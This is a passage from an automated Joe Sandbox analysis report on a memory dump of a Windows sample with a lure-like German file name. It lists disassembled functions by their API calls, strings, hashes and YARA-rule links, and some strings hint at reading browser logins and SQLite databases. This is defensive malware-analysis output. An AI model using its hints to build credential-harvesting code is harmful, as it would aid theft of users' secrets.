                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                            • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                            • String ID: ($d
                                                            • API String ID: 1140211610-1915259565
                                                            • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                            • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                            Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                            • String ID:
                                                            • API String ID: 3015003838-0
                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                            Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00407E44
                                                            • memset.MSVCRT ref: 00407E5B
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                            • wcscpy.MSVCRT ref: 00407F10
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                            • String ID:
                                                            • API String ID: 59245283-0
                                                            • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                            • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                            Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                            • free.MSVCRT ref: 004185AC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                            • String ID:
                                                            • API String ID: 2802642348-0
                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                            Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                            • API String ID: 3510742995-3273207271
                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                            Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                            • memset.MSVCRT ref: 00413ADC
                                                            • memset.MSVCRT ref: 00413AEC
                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                            • memset.MSVCRT ref: 00413BD7
                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                            • String ID: 3A
                                                            • API String ID: 3300951397-293699754
                                                            • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                            • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                            Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                            • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                            • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                            • String ID: strings
                                                            • API String ID: 3166385802-3030018805
                                                            • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                            • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                            Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00411AF6
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                            • wcscat.MSVCRT ref: 00411B2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                            • String ID: AE$.cfg$General$EA
                                                            • API String ID: 776488737-1622828088
                                                            • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                            • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                            Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040D8BD
                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                            • memset.MSVCRT ref: 0040D906
                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                            • String ID: sysdatetimepick32
                                                            • API String ID: 1028950076-4169760276
                                                            • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                            • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                            Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                            • memset.MSVCRT ref: 0041BA3D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: -journal$-wal
                                                            • API String ID: 438689982-2894717839
                                                            • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                            • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                            Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$Dialog$MessageSend
                                                            • String ID:
                                                            • API String ID: 3975816621-0
                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                            Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                            • String ID: .save$http://$https://$log profile$signIn
                                                            • API String ID: 1214746602-2708368587
                                                            • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                            • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                            Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                            • memset.MSVCRT ref: 00405E33
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                            • String ID:
                                                            • API String ID: 2313361498-0
                                                            • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                            • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                            Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageRectSend$Client
                                                            • String ID:
                                                            • API String ID: 2047574939-0
                                                            • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                            • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                            Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                            • String ID:
                                                            • API String ID: 4218492932-0
                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
